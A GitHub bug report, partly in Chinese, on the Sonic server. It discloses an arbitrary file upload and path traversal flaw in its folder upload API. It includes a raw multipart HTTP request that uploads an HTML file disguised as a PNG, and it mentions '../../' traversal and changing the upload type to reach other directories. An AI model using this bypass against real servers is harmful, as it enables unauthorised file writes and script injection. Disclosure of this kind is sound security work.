sonic-server icon indicating copy to clipboard operation
sonic-server copied to clipboard
verified publisher icon SonicCloudOrg

[Bug] 任意文件上传和目录穿越

Open xxdppyy opened this issue 2 years ago • 1 comments

Search before asking

  • [X] I searched in the issue and found nothing similar. | 我查找了并确认issue列表无相似报告。

Sonic version

最新服务器版

Deploy platform

window10

Minimal reproduce step

image 这个上传接口只有前端验证 可以上传png 然后抓包进行绕过

包: POST /server/api/folder/upload HTTP/1.1 Host: ip Content-Length: 460 SonicToken: Accept-Language: zh_CN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1AHSz0CNwNeWDnSP Accept: / Origin: Referer: Accept-Encoding: gzip, deflate Connection: close

------WebKitFormBoundary1AHSz0CNwNeWDnSP Content-Disposition: form-data; name="file"; filename="svgxss1.html" Content-Type: image/png

------WebKitFormBoundary1AHSz0CNwNeWDnSP Content-Disposition: form-data; name="type"

imageFiles ------WebKitFormBoundary1AHSz0CNwNeWDnSP--

另外以跨目录进行上传 批注 2023-11-21 113655

../../也可以 另外还纯在越权

image 可改为logfiles 和目录中其他的

Are you willing to submit a PR?

  • [X] I'm willing to submit a PR! | 我将发起PR!

xxdppyy avatar Nov 21 '23 03:11 xxdppyy